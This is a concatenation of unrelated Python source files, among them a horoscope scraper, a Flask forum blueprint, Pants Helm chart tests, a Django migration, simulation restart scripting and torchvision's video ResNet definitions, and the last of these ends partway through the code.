    an unknown sign raises KeyError, a site layout change raises IndexError.
    """
    constellationDict = dict()
    # Chinese sign name -> English name used in both sites' URLs.
    constellationDict = {'牡羊': 'Aries', '金牛': 'Taurus', '雙子': 'Gemini','巨蟹': 'Cancer',
                         '獅子': 'Leo', '處女': 'Virgo', '天秤': 'Libra','天蠍': 'Scorpio',
                         '射手': 'Sagittarius', '魔羯': 'Capricorn', '摩羯':'Capricorn','水瓶': 'Aquarius', '雙魚': 'Pisces'}
    url = 'http://www.daily-zodiac.com/mobile/zodiac/{}'.format(constellationDict[star])
    # NOTE(review): verify=False disables TLS certificate checking — confirm
    # this is intentional for this host.
    res = requests.get(url,verify=False)
    res.encoding = 'utf-8'
    soup = BeautifulSoup(res.text,'html.parser')
    #print(soup)
    name = soup.find_all('p')
    #print(name)
    # First two <p> tags are assumed to be the sign name and its date range
    # — TODO confirm against the page layout.
    starAndDate = []
    for n in name:
        #print n.text.encode('utf8')
        starAndDate.append(n.text)
    #print(starAndDate)
    today = soup.select('.today')[0].text.strip('\n')
    today = today.split('\n\n')[0]
    #print today
    title = soup.find('li').text.strip()
    #print(title)
    content = soup.find('article').text.strip()
    #print content
    resultString = ''
    resultString += starAndDate[0] + ' ' + starAndDate[1] + '\n'
    resultString += today + '\n'
    resultString += content + '\n\n'
    resultString += 'from 唐立淇每日星座運勢' + '\n\n'
    resultString += '-以下是小歐星座網站-' + '\n'
    # Second source: append each title/content pair from the other site.
    urlOrz= 'https://horoscope.dice4rich.com/?sign={}'.format(constellationDict[star])
    urlOrz = urlOrz.lower()
    res = requests.get(urlOrz)
    soup = BeautifulSoup(res.text,'html.parser')
    title = soup.select('.current .title')
    content = soup.select('.current .content')
    # Interleaves titles (even i) and contents (odd i); assumes both lists
    # have equal length — TODO confirm, otherwise IndexError is possible.
    for i in range(len(title)+len(content)):
        if i%2 == 0:
            print(title[int(i/2)].text.strip())
            resultString += title[int(i/2)].text.strip() + '\n'
        else:
            print(content[int(i/2)].text)
            resultString += content[int(i/2)].text + '\n\n'
    return resultString
|
# NOTE(review): the original file was not valid Python:
#   "import Minefield from python-sweeper"  -- inverted import syntax and an
#   illegal dash in the module name -- and an unterminated final statement
#   "print(Minefield.min".  Reconstructed minimally below; confirm the actual
#   package/module name of the sweeper project.
import unittest

from python_sweeper import Minefield  # TODO confirm module name


class TestMinefield:
    """ Test the Minefield class
    """

    def test_minefield_params(self):
        """ Test that the minefield gets initialized with correct parameters
        """
        tminefield = Minefield(10, 10)
        # Original intent (truncated in source) appears to be inspecting a
        # Minefield attribute; assert construction succeeded for now.
        assert tminefield is not None
|
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A Bucket ACL Resource."""
class BucketAccessControls(object):
    """Bucket ACL Resource.

    Instances are value objects: equality and hashing are both defined over
    the same property tuple, so equal-valued ACL entries deduplicate
    correctly in sets and dicts.
    """

    def __init__(self, bucket, entity, email, domain, role,
                 project_number=None):
        """Initialize

        Args:
            bucket (str): GCS bucket
            entity (str): GCS entity
            email (str): email
            domain (str): domain
            role (str): GCS role
            project_number (int): the project number
        """
        self.bucket = bucket
        self.entity = entity
        self.email = email
        self.domain = domain
        self.role = role
        self.project_number = project_number

    def _key(self):
        """Return the property tuple shared by __eq__ and __hash__."""
        return (self.bucket, self.entity, self.email, self.domain,
                self.role, self.project_number)

    def __eq__(self, other):
        """Value equality over the same properties used by __hash__.

        Added because the original defined __hash__ without __eq__, leaving
        identity-based equality inconsistent with the value-based hash.

        Args:
            other (object): the object to compare against.
        Returns:
            bool: True if *other* is an equal-valued BucketAccessControls.
        """
        if not isinstance(other, BucketAccessControls):
            return NotImplemented
        return self._key() == other._key()

    def __hash__(self):
        """Return hash of properties.

        Returns:
            hash: The hash of the class properties.
        """
        return hash(self._key())
|
class dataprocess:
    """Data-processing helpers; both methods are unimplemented stubs."""

    # Split *data* into pages of *num* entries (stub; original comment said
    # "perform pagination").
    def paging(self, data, num):
        pass

    # Sort *data* according to certain criteria (stub; original comment said
    # "sort the data by some requirements").
    def ranking(self, data):
        pass
|
from flask import Blueprint, g
from app import render_default_template, db
from .forum_models import ForumCategory, Forum, ForumThread, ForumReply
from .forum_forms import NewReplyForm
from flask_login import current_user
# Blueprint under which all forum views below are registered.
bp_forum = Blueprint("forum", __name__)
@bp_forum.route("/")
def forum_index():
    """Render the forum landing page listing every category."""
    categories = ForumCategory.query.all()
    return render_default_template("plugins/forum/main.html", cats=categories)
@bp_forum.route("/forum_<int:fid>")
def forum_forum(fid: int):
    """Render a single forum by id (template receives None when not found)."""
    matched = Forum.query.filter_by(fid=fid).first()
    return render_default_template("plugins/forum/forum.html", forum=matched)
@bp_forum.route("/thread_<int:tid>", methods=["POST", "GET"])
def forum_thread(tid: int):
    """Show a thread and handle posting of new replies."""
    thread = ForumThread.query.filter_by(tid=tid).first()
    form = NewReplyForm()
    if form.validate_on_submit():
        # Persist the reply authored by the currently logged-in user.
        reply = ForumReply(form.reply.data, current_user.uid, thread)
        db.session.add(reply)
        db.session.commit()
    return render_default_template("plugins/forum/thread.html", thread=thread, form=form)
|
# -*- coding: utf-8 -*-
from typing import List
class Solution:
    """LeetCode 416: can *nums* be split into two subsets of equal sum?"""

    def canPartition(self, nums: List[int]) -> bool:
        """Subset-sum over reachable sums; True iff half the total is reachable."""
        total = sum(nums)
        # An odd total can never be split into two equal halves.
        if total % 2:
            return False
        target = total // 2
        reachable = {0}
        for num in nums:
            updated = set(reachable)
            for value in reachable:
                # Early exit the moment the target becomes reachable.
                if value + num == target:
                    return True
                updated.add(value + num)
            reachable = updated
        return target in reachable
if __name__ == "__main__":
    # Quick self-checks using the problem statement's examples.
    solution = Solution()
    assert solution.canPartition([1, 5, 11, 5])
    assert not solution.canPartition([1, 2, 3, 5])
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from textwrap import dedent
import pytest
from pants.backend.helm.target_types import (
HelmArtifactTarget,
HelmChartTarget,
HelmDeploymentFieldSet,
HelmDeploymentTarget,
)
from pants.backend.helm.target_types import rules as target_types_rules
from pants.backend.helm.testutil import (
HELM_TEMPLATE_HELPERS_FILE,
HELM_VALUES_FILE,
K8S_SERVICE_TEMPLATE,
gen_chart_file,
)
from pants.backend.helm.util_rules import chart
from pants.backend.helm.util_rules.chart import FindHelmDeploymentChart, HelmChart, HelmChartRequest
from pants.backend.helm.util_rules.chart_metadata import (
ChartType,
HelmChartDependency,
HelmChartMetadata,
ParseHelmChartMetadataDigest,
)
from pants.build_graph.address import Address
from pants.engine.internals.scheduler import ExecutionError
from pants.engine.rules import QueryRule
from pants.testutil.rule_runner import RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
    """RuleRunner with chart util rules and all Helm target types registered."""
    query_rules = [
        QueryRule(HelmChart, (HelmChartRequest,)),
        QueryRule(HelmChartMetadata, (ParseHelmChartMetadataDigest,)),
        QueryRule(HelmChart, (FindHelmDeploymentChart,)),
    ]
    return RuleRunner(
        target_types=[HelmChartTarget, HelmArtifactTarget, HelmDeploymentTarget],
        rules=[*chart.rules(), *target_types_rules(), *query_rules],
    )
# (name, version, chart type, icon URL or None) cases for the collect test.
_TEST_CHART_COLLECT_SOURCES_PARAMS = [
    ("foo", "0.1.0", ChartType.APPLICATION, "https://www.example.com/icon.png"),
    ("bar", "0.2.0", ChartType.LIBRARY, None),
]
@pytest.mark.parametrize("name, version, type, icon", _TEST_CHART_COLLECT_SOURCES_PARAMS)
def test_collects_single_chart_sources(
    rule_runner: RuleRunner,
    name: str,
    version: str,
    type: ChartType,
    icon: str | None,
) -> None:
    """A standalone chart's sources are collected and its metadata parsed."""
    rule_runner.write_files(
        {
            "BUILD": f"helm_chart(name='{name}')",
            "Chart.yaml": gen_chart_file(name, version=version, type=type, icon=icon),
            "values.yaml": HELM_VALUES_FILE,
            "templates/_helpers.tpl": HELM_TEMPLATE_HELPERS_FILE,
            "templates/service.yaml": K8S_SERVICE_TEMPLATE,
        }
    )
    address = Address("", target_name=name)
    tgt = rule_runner.get_target(address)
    expected_metadata = HelmChartMetadata(
        name=name,
        version=version,
        icon=icon,
        type=type,
    )
    helm_chart = rule_runner.request(HelmChart, [HelmChartRequest.from_target(tgt)])
    # A purely local chart has no remote artifact attached.
    assert not helm_chart.artifact
    assert helm_chart.info == expected_metadata
    # Chart.yaml + values.yaml + the two template files.
    assert len(helm_chart.snapshot.files) == 4
    assert helm_chart.address == address
def test_override_metadata_version(rule_runner: RuleRunner) -> None:
    """The BUILD-level version field wins over the version in Chart.yaml."""
    chart_files = {
        "BUILD": "helm_chart(name='foo', version='2.0.0')",
        "Chart.yaml": gen_chart_file("foo", version="1.0.0"),
        "values.yaml": HELM_VALUES_FILE,
        "templates/_helpers.tpl": HELM_TEMPLATE_HELPERS_FILE,
        "templates/service.yaml": K8S_SERVICE_TEMPLATE,
    }
    rule_runner.write_files(chart_files)
    tgt = rule_runner.get_target(Address("", target_name="foo"))
    helm_chart = rule_runner.request(HelmChart, [HelmChartRequest.from_target(tgt)])
    assert not helm_chart.artifact
    assert helm_chart.info == HelmChartMetadata(name="foo", version="2.0.0")
def test_gathers_local_subchart_sources_using_explicit_dependency(rule_runner: RuleRunner) -> None:
    """An explicit BUILD dependency vendors the subchart under charts/."""
    rule_runner.write_files(
        {
            "src/chart1/BUILD": "helm_chart()",
            "src/chart1/Chart.yaml": dedent(
                """\
                apiVersion: v2
                name: chart1
                version: 0.1.0
                """
            ),
            "src/chart1/values.yaml": HELM_VALUES_FILE,
            "src/chart1/templates/_helpers.tpl": HELM_TEMPLATE_HELPERS_FILE,
            "src/chart1/templates/service.yaml": K8S_SERVICE_TEMPLATE,
            "src/chart2/BUILD": "helm_chart(dependencies=['//src/chart1'])",
            "src/chart2/Chart.yaml": dedent(
                """\
                apiVersion: v2
                name: chart2
                version: 0.1.0
                dependencies:
                - name: chart1
                  alias: foo
                """
            ),
        }
    )
    target = rule_runner.get_target(Address("src/chart2", target_name="chart2"))
    helm_chart = rule_runner.request(HelmChart, [HelmChartRequest.from_target(target)])
    # The subchart's files end up vendored inside the assembled snapshot.
    assert "charts/chart1" in helm_chart.snapshot.dirs
    assert "charts/chart1/templates/service.yaml" in helm_chart.snapshot.files
    # The alias declared in Chart.yaml is preserved in the parsed metadata.
    assert len(helm_chart.info.dependencies) == 1
    assert helm_chart.info.dependencies[0].name == "chart1"
    assert helm_chart.info.dependencies[0].alias == "foo"
def test_gathers_all_subchart_sources_inferring_dependencies(rule_runner: RuleRunner) -> None:
    """Dependencies declared only in Chart.yaml are inferred and resolved."""
    rule_runner.write_files(
        {
            "3rdparty/helm/jetstack/BUILD": dedent(
                """\
                helm_artifact(
                  name="cert-manager",
                  repository="https://charts.jetstack.io",
                  artifact="cert-manager",
                  version="v0.7.0"
                )
                """
            ),
            "src/chart1/BUILD": "helm_chart()",
            "src/chart1/Chart.yaml": dedent(
                """\
                apiVersion: v2
                name: chart1
                version: 0.1.0
                """
            ),
            "src/chart1/values.yaml": HELM_VALUES_FILE,
            "src/chart1/templates/_helpers.tpl": HELM_TEMPLATE_HELPERS_FILE,
            "src/chart1/templates/service.yaml": K8S_SERVICE_TEMPLATE,
            "src/chart2/BUILD": "helm_chart()",
            "src/chart2/Chart.yaml": dedent(
                """\
                apiVersion: v2
                name: chart2
                version: 0.1.0
                dependencies:
                - name: chart1
                  alias: dep1
                - name: cert-manager
                  repository: "https://charts.jetstack.io"
                """
            ),
        }
    )
    # Note: no explicit BUILD dependencies on chart2 — both the local chart1
    # and the third-party cert-manager must be inferred from Chart.yaml.
    expected_metadata = HelmChartMetadata(
        name="chart2",
        api_version="v2",
        version="0.1.0",
        dependencies=(
            HelmChartDependency(
                name="chart1",
                alias="dep1",
                version="0.1.0",
            ),
            HelmChartDependency(
                name="cert-manager", repository="https://charts.jetstack.io", version="v0.7.0"
            ),
        ),
    )
    target = rule_runner.get_target(Address("src/chart2", target_name="chart2"))
    helm_chart = rule_runner.request(HelmChart, [HelmChartRequest.from_target(target)])
    assert helm_chart.info == expected_metadata
    # Both subcharts are vendored under charts/ in the snapshot.
    assert "charts/chart1" in helm_chart.snapshot.dirs
    assert "charts/chart1/templates/service.yaml" in helm_chart.snapshot.files
    assert "charts/cert-manager" in helm_chart.snapshot.dirs
    assert "charts/cert-manager/Chart.yaml" in helm_chart.snapshot.files
def test_chart_metadata_is_updated_with_explicit_dependencies(rule_runner: RuleRunner) -> None:
    """Dependencies given via BUILD `dependencies=` are injected into the chart.

    chart2's Chart.yaml lists no dependencies at all; the explicit BUILD
    dependencies must show up both in the in-memory metadata and in the
    Chart.yaml re-parsed out of the built chart digest.
    """
    rule_runner.write_files(
        {
            "3rdparty/helm/jetstack/BUILD": dedent(
                """\
                helm_artifact(
                  name="cert-manager",
                  repository="https://charts.jetstack.io",
                  artifact="cert-manager",
                  version="v0.7.0"
                )
                """
            ),
            "src/chart1/BUILD": "helm_chart()",
            "src/chart1/Chart.yaml": dedent(
                """\
                apiVersion: v2
                name: chart1
                version: 0.1.0
                """
            ),
            "src/chart2/BUILD": dedent(
                """\
                helm_chart(dependencies=["//src/chart1", "//3rdparty/helm/jetstack:cert-manager"])
                """
            ),
            "src/chart2/Chart.yaml": dedent(
                """\
                apiVersion: v2
                name: chart2
                version: 0.1.0
                """
            ),
        }
    )
    expected_metadata = HelmChartMetadata(
        name="chart2",
        api_version="v2",
        version="0.1.0",
        dependencies=(
            HelmChartDependency(
                name="chart1",
                version="0.1.0",
            ),
            HelmChartDependency(
                name="cert-manager", version="v0.7.0", repository="https://charts.jetstack.io"
            ),
        ),
    )
    target = rule_runner.get_target(Address("src/chart2", target_name="chart2"))
    helm_chart = rule_runner.request(HelmChart, [HelmChartRequest.from_target(target)])
    # Re-parse the Chart.yaml contained in the built digest to prove the file
    # itself was rewritten, not just the in-memory metadata object.
    new_metadata = rule_runner.request(
        HelmChartMetadata,
        [
            ParseHelmChartMetadataDigest(
                helm_chart.snapshot.digest,
                description_of_origin="test_chart_metadata_is_updated_with_explicit_dependencies",
            )
        ],
    )
    assert helm_chart.info == expected_metadata
    assert new_metadata == expected_metadata
def test_obtain_chart_from_deployment(rule_runner: RuleRunner) -> None:
    """A `helm_deployment` resolves its chart from either kind of dependency.

    A first-party `helm_chart` dependency yields a source-built chart
    (no artifact attached), while a `helm_artifact` dependency yields a
    downloaded third-party chart (artifact set).
    """
    rule_runner.write_files(
        {
            "3rdparty/helm/BUILD": dedent(
                """\
                helm_artifact(
                  name="cert-manager",
                  repository="https://charts.jetstack.io/",
                  artifact="cert-manager",
                  version="v1.7.1"
                )
                """
            ),
            "src/foo/BUILD": "helm_chart()",
            "src/foo/Chart.yaml": gen_chart_file("foo", version="1.0.0"),
            "src/deploy/BUILD": dedent(
                """\
                helm_deployment(name="first_party", dependencies=["//src/foo"])
                helm_deployment(name="3rd_party", dependencies=["//3rdparty/helm:cert-manager"])
                """
            ),
        }
    )
    first_party_target = rule_runner.get_target(Address("src/deploy", target_name="first_party"))
    third_party_target = rule_runner.get_target(Address("src/deploy", target_name="3rd_party"))
    first_party_chart = rule_runner.request(
        HelmChart, [FindHelmDeploymentChart(HelmDeploymentFieldSet.create(first_party_target))]
    )
    assert first_party_chart.info.name == "foo"
    assert first_party_chart.info.version == "1.0.0"
    # First-party charts are built from sources, so no fetched artifact.
    assert not first_party_chart.artifact
    third_party_chart = rule_runner.request(
        HelmChart, [FindHelmDeploymentChart(HelmDeploymentFieldSet.create(third_party_target))]
    )
    assert third_party_chart.info.name == "cert-manager"
    assert third_party_chart.info.version == "v1.7.1"
    assert third_party_chart.artifact
def test_fail_when_no_chart_dependency_is_found_for_a_deployment(rule_runner: RuleRunner) -> None:
    """A deployment without any chart-like dependency fails with a clear error."""
    rule_runner.write_files({"BUILD": """helm_deployment(name="foo")"""})
    target = rule_runner.get_target(Address("", target_name="foo"))
    field_set = HelmDeploymentFieldSet.create(target)
    # The expected message doubles as the pytest.raises match pattern.
    msg = f"The target '{field_set.address}' is missing a dependency on a `helm_chart` or a `helm_artifact` target."
    with pytest.raises(ExecutionError, match=msg):
        rule_runner.request(HelmChart, [FindHelmDeploymentChart(field_set)])
def test_fail_when_more_than_one_chart_is_found_for_a_deployment(rule_runner: RuleRunner) -> None:
    """A deployment depending on two charts is ambiguous and must fail."""
    rule_runner.write_files(
        {
            "src/foo/BUILD": "helm_chart()",
            "src/foo/Chart.yaml": gen_chart_file("foo", version="1.0.0"),
            "src/bar/BUILD": "helm_chart()",
            "src/bar/Chart.yaml": gen_chart_file("bar", version="1.0.3"),
            "src/quxx/BUILD": dedent(
                """\
                helm_deployment(dependencies=["//src/foo", "//src/bar"])
                """
            ),
        }
    )
    target = rule_runner.get_target(Address("src/quxx"))
    field_set = HelmDeploymentFieldSet.create(target)
    msg = (
        f"The target '{field_set.address}' has more than one `helm_chart` "
        "or `helm_artifact` addresses in its dependencies, it should have only one."
    )
    with pytest.raises(ExecutionError, match=msg):
        rule_runner.request(HelmChart, [FindHelmDeploymentChart(field_set)])
|
# Generated by Django 2.2.4 on 2019-10-12 13:45
from django.db import migrations, models
class Migration(migrations.Migration):
    """Switch `Payment.receipt` to an ImageField storing bank-slip uploads."""
    dependencies = [
        ('billings', '0003_auto_20191006_1603'),
    ]
    operations = [
        migrations.AlterField(
            model_name='payment',
            name='receipt',
            # Uploaded files land under MEDIA_ROOT/bankSlip/.
            field=models.ImageField(upload_to='bankSlip/', verbose_name='Bank Slip'),
        ),
    ]
|
#!/usr/bin/python
def count_partitions(total: int = 100) -> int:
    """Count the ways to write ``total`` as a sum of at least two positive
    integers, i.e. the partitions of ``total`` whose parts are all smaller
    than ``total`` (Project Euler 76 for ``total == 100``).

    Generalized from the original hard-coded 100 via the ``total`` parameter.
    Classic bounded "coin change" DP: ``ways[j]`` accumulates the number of
    ways to build ``j`` from parts 1..total-1.
    """
    ways = [0] * (total + 1)
    ways[0] = 1  # one way to make zero: the empty sum
    for part in range(1, total):  # parts strictly smaller than total
        for j in range(part, total + 1):
            ways[j] += ways[j - part]
    return ways[total]


# Preserve the original script behavior: print the answer for 100.
print(count_partitions(100))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 14 21:59:46 2020
@author: thomas
"""
import numpy as np
import pandas as pd
import os, sys
import time as t
import subprocess
from shutil import copyfile
import pathlib
#CONSTANTS
cwd_PYTHON = os.getcwd() + '/'
# constructs a filepath for the pos data of Re = $Re
def pname(cwd):
    """Return the path of the Re=2 start-position summary CSV under *cwd*."""
    return "{}startLData_Re2_.csv".format(cwd)
def GetLData(cwd):
    """Load the Re=2 position-sweep CSV from *cwd* and normalise it.

    Doubles the stored half-extents (parHx/parHy), keeps only rows with
    parThetaBW <= 180 degrees, and returns the frame sorted by
    (parThetaBW, parHx, parHy) with a fresh index.
    """
    frame = pd.read_csv(pname(cwd), delimiter=' ')
    # Stored values are half-extents; convert to full extents.
    frame['parHy'] *= 2.0
    frame['parHx'] *= 2.0
    frame = frame[frame['parThetaBW'] <= 180.0].copy()
    frame = frame.sort_values(by=['parThetaBW', 'parHx', 'parHy'])
    return frame.reset_index(drop=True)
def GetRestartIndex(cwd):
    """Return the restart dump index for the simulation directory *cwd*.

    Reads ``pd.txt``, takes the latest recorded time for body idx == 6,
    truncates it to whole seconds, and converts to a dump index assuming
    1e5 steps per second.  Returns 0 when no ``pd.txt`` exists (fresh run).
    """
    if not pathlib.Path(cwd + 'pd.txt').exists():
        return 0
    frame = pd.read_csv(cwd + 'pd.txt', delimiter=' ')
    # Only rows for body index 6 matter; order them chronologically.
    body = frame[frame['idx'] == 6].copy()
    body = body.sort_values(by=['time']).reset_index(drop=True)
    last_row = body.tail(1).reset_index(drop=True)
    whole_seconds = int(np.trunc(last_row.loc[0, 'time']))
    return int(whole_seconds * 1e5)
if __name__ == '__main__':
    #READ NOTAList.txt to get all sims that did not complete
    #Whether through error or through no end state
    #Pull Hx, Hy, Theta parameters for each
    #Change directory to Theta$Theta/Hx$Hx/Hy$Hy
    #Modify 'script_restart.sh and copy to specified directory
    #Copy input2D_restart into directory
    #Submit with subprocess the command "sbatch script_restart.sh"
    cwd_PYTHON = os.getcwd() + '/'
    data = GetLData(cwd_PYTHON)
    #Restart simulation where it left off. Some at 40s. Some at 20s.
    # NOTE(review): 'endTime' is assumed to be a column present in the CSV
    # loaded by GetLData (it is not created there) -- confirm against the file.
    for idx in range(len(data['endTime'])):
        parTheta = np.round(data.loc[idx,'parThetaBW'],1)
        parHx = np.round(data.loc[idx,'parHx'],1)
        parHy = int(np.round(data.loc[idx,'parHy'],1))
        #Find restart interval from pd.txt data
        cwd_POS = cwd_PYTHON+'Theta{0}/Hx{1}/Hy{2}/'.format(parTheta,parHx,parHy)
        restartIndex = GetRestartIndex(cwd_POS)
        print('Re2: Theta={0}: Hx={1}: Hy={2}: time = {3}'.format(parTheta,parHx,parHy,restartIndex/1e5))
        #Copy pd.txt as pd3.txt over to another directory
        strDir = cwd_PYTHON+'PosData/Re2/Theta{0}/Hx{1}/Hy{2}/'.format(parTheta,parHx,parHy)
        pathlib.Path(strDir).mkdir(parents=True, exist_ok=True)
        posFile = cwd_POS+'pd.txt'
        newposFile = strDir+'pd3.txt'
        # NOTE(review): shell 'cp' breaks on paths with spaces and ignores
        # failures; shutil.copyfile would be safer.
        os.system('cp '+posFile+' '+newposFile)
|
from ._line import Line
from ._hoverlabel import Hoverlabel
from plotly.graph_objs.sankey.node import hoverlabel
|
def solution(nums):
    """Return a sorted copy of *nums* when it is a list or tuple, else []."""
    if not isinstance(nums, (list, tuple)):
        return []
    return sorted(nums)
|
from functools import partial
from typing import Any, Callable, List, Optional, Sequence, Tuple, Type, Union
import torch.nn as nn
from torch import Tensor
from ...transforms._presets import VideoClassification
from ...utils import _log_api_usage_once
from .._api import register_model, Weights, WeightsEnum
from .._meta import _KINETICS400_CATEGORIES
from .._utils import _ovewrite_named_param, handle_legacy_interface
__all__ = [
"VideoResNet",
"R3D_18_Weights",
"MC3_18_Weights",
"R2Plus1D_18_Weights",
"r3d_18",
"mc3_18",
"r2plus1d_18",
]
class Conv3DSimple(nn.Conv3d):
    """Plain full 3x3x3 spatio-temporal convolution without bias."""

    def __init__(
        self, in_planes: int, out_planes: int, midplanes: Optional[int] = None, stride: int = 1, padding: int = 1
    ) -> None:
        # `midplanes` is accepted (and ignored) purely so every conv builder
        # shares the same call signature.
        conv_cfg = dict(
            in_channels=in_planes,
            out_channels=out_planes,
            kernel_size=(3, 3, 3),
            stride=stride,
            padding=padding,
            bias=False,
        )
        super().__init__(**conv_cfg)

    @staticmethod
    def get_downsample_stride(stride: int) -> Tuple[int, int, int]:
        # Downsample every dimension (time and space) equally.
        return (stride,) * 3
class Conv2Plus1D(nn.Sequential):
    """Factorised (2+1)D convolution: spatial 1x3x3, BN+ReLU, temporal 3x1x1."""

    def __init__(self, in_planes: int, out_planes: int, midplanes: int, stride: int = 1, padding: int = 1) -> None:
        spatial_conv = nn.Conv3d(
            in_planes,
            midplanes,
            kernel_size=(1, 3, 3),
            stride=(1, stride, stride),
            padding=(0, padding, padding),
            bias=False,
        )
        temporal_conv = nn.Conv3d(
            midplanes, out_planes, kernel_size=(3, 1, 1), stride=(stride, 1, 1), padding=(padding, 0, 0), bias=False
        )
        super().__init__(spatial_conv, nn.BatchNorm3d(midplanes), nn.ReLU(inplace=True), temporal_conv)

    @staticmethod
    def get_downsample_stride(stride: int) -> Tuple[int, int, int]:
        # The combined (2+1)D stride acts on every dimension.
        return (stride,) * 3
class Conv3DNoTemporal(nn.Conv3d):
    """Spatial-only 1x3x3 convolution; the temporal axis is left untouched."""

    def __init__(
        self, in_planes: int, out_planes: int, midplanes: Optional[int] = None, stride: int = 1, padding: int = 1
    ) -> None:
        # `midplanes` exists only to keep the conv-builder signature uniform.
        conv_cfg = {
            "in_channels": in_planes,
            "out_channels": out_planes,
            "kernel_size": (1, 3, 3),
            "stride": (1, stride, stride),
            "padding": (0, padding, padding),
            "bias": False,
        }
        super().__init__(**conv_cfg)

    @staticmethod
    def get_downsample_stride(stride: int) -> Tuple[int, int, int]:
        # Never stride the temporal dimension.
        return 1, stride, stride
class BasicBlock(nn.Module):
    """Two-convolution residual block (ResNet-18/34 style) for video nets.

    NOTE: submodule attribute names (conv1/conv2/downsample) and their
    creation order are load-bearing for pretrained state_dicts.
    """
    expansion = 1
    def __init__(
        self,
        inplanes: int,
        planes: int,
        conv_builder: Callable[..., nn.Module],
        stride: int = 1,
        downsample: Optional[nn.Module] = None,
    ) -> None:
        # Width of the factorised middle layer used by Conv2Plus1D, chosen so
        # the (2+1)D block matches the parameter budget of a full 3x3x3 conv
        # (R(2+1)D paper); other builders simply ignore it.
        midplanes = (inplanes * planes * 3 * 3 * 3) // (inplanes * 3 * 3 + 3 * planes)
        super().__init__()
        self.conv1 = nn.Sequential(
            conv_builder(inplanes, planes, midplanes, stride), nn.BatchNorm3d(planes), nn.ReLU(inplace=True)
        )
        self.conv2 = nn.Sequential(conv_builder(planes, planes, midplanes), nn.BatchNorm3d(planes))
        self.relu = nn.ReLU(inplace=True)
        self.downsample = downsample
        self.stride = stride
    def forward(self, x: Tensor) -> Tensor:
        residual = x
        out = self.conv1(x)
        out = self.conv2(out)
        if self.downsample is not None:
            # Project the identity branch when shape/channels change.
            residual = self.downsample(x)
        out += residual
        out = self.relu(out)
        return out
class Bottleneck(nn.Module):
    """Three-convolution bottleneck residual block (ResNet-50 style).

    Channel flow: inplanes -> planes (1x1x1) -> planes (builder conv)
    -> planes * 4 (1x1x1), with residual add and final ReLU.
    """
    expansion = 4
    def __init__(
        self,
        inplanes: int,
        planes: int,
        conv_builder: Callable[..., nn.Module],
        stride: int = 1,
        downsample: Optional[nn.Module] = None,
    ) -> None:
        super().__init__()
        # Parameter-matching width for the factorised (2+1)D middle conv.
        midplanes = (inplanes * planes * 3 * 3 * 3) // (inplanes * 3 * 3 + 3 * planes)
        # 1x1x1
        self.conv1 = nn.Sequential(
            nn.Conv3d(inplanes, planes, kernel_size=1, bias=False), nn.BatchNorm3d(planes), nn.ReLU(inplace=True)
        )
        # Second kernel
        self.conv2 = nn.Sequential(
            conv_builder(planes, planes, midplanes, stride), nn.BatchNorm3d(planes), nn.ReLU(inplace=True)
        )
        # 1x1x1
        self.conv3 = nn.Sequential(
            nn.Conv3d(planes, planes * self.expansion, kernel_size=1, bias=False),
            nn.BatchNorm3d(planes * self.expansion),
        )
        self.relu = nn.ReLU(inplace=True)
        self.downsample = downsample
        self.stride = stride
    def forward(self, x: Tensor) -> Tensor:
        residual = x
        out = self.conv1(x)
        out = self.conv2(out)
        out = self.conv3(out)
        if self.downsample is not None:
            # Project the identity branch to the widened/strided shape.
            residual = self.downsample(x)
        out += residual
        out = self.relu(out)
        return out
class BasicStem(nn.Sequential):
    """The default conv-batchnorm-relu stem: 3x7x7 conv into 64 channels,
    halving the spatial resolution but keeping full temporal resolution."""

    def __init__(self) -> None:
        stem_layers = [
            nn.Conv3d(3, 64, kernel_size=(3, 7, 7), stride=(1, 2, 2), padding=(1, 3, 3), bias=False),
            nn.BatchNorm3d(64),
            nn.ReLU(inplace=True),
        ]
        super().__init__(*stem_layers)
class R2Plus1dStem(nn.Sequential):
    """R(2+1)D stem is different than the default one as it uses separated 3D convolution:
    a spatial 1x7x7 conv into 45 mid channels followed by a temporal 3x1x1 conv to 64."""

    def __init__(self) -> None:
        stem_layers = [
            nn.Conv3d(3, 45, kernel_size=(1, 7, 7), stride=(1, 2, 2), padding=(0, 3, 3), bias=False),
            nn.BatchNorm3d(45),
            nn.ReLU(inplace=True),
            nn.Conv3d(45, 64, kernel_size=(3, 1, 1), stride=(1, 1, 1), padding=(1, 0, 0), bias=False),
            nn.BatchNorm3d(64),
            nn.ReLU(inplace=True),
        ]
        super().__init__(*stem_layers)
class VideoResNet(nn.Module):
    def __init__(
        self,
        block: Type[Union[BasicBlock, Bottleneck]],
        conv_makers: Sequence[Type[Union[Conv3DSimple, Conv3DNoTemporal, Conv2Plus1D]]],
        layers: List[int],
        stem: Callable[..., nn.Module],
        num_classes: int = 400,
        zero_init_residual: bool = False,
    ) -> None:
        """Generic resnet video generator.
        Args:
            block (Type[Union[BasicBlock, Bottleneck]]): resnet building block
            conv_makers (List[Type[Union[Conv3DSimple, Conv3DNoTemporal, Conv2Plus1D]]]): generator
                function for each layer
            layers (List[int]): number of blocks per layer
            stem (Callable[..., nn.Module]): module specifying the ResNet stem.
            num_classes (int, optional): Dimension of the final FC layer. Defaults to 400.
            zero_init_residual (bool, optional): Zero init bottleneck residual BN. Defaults to False.
        """
        super().__init__()
        _log_api_usage_once(self)
        self.inplanes = 64
        self.stem = stem()
        # Four stages, one conv builder each; resolution is halved by the
        # stride-2 stages from layer2 onward.
        self.layer1 = self._make_layer(block, conv_makers[0], 64, layers[0], stride=1)
        self.layer2 = self._make_layer(block, conv_makers[1], 128, layers[1], stride=2)
        self.layer3 = self._make_layer(block, conv_makers[2], 256, layers[2], stride=2)
        self.layer4 = self._make_layer(block, conv_makers[3], 512, layers[3], stride=2)
        self.avgpool = nn.AdaptiveAvgPool3d((1, 1, 1))
        self.fc = nn.Linear(512 * block.expansion, num_classes)
        # init weights
        for m in self.modules():
            if isinstance(m, nn.Conv3d):
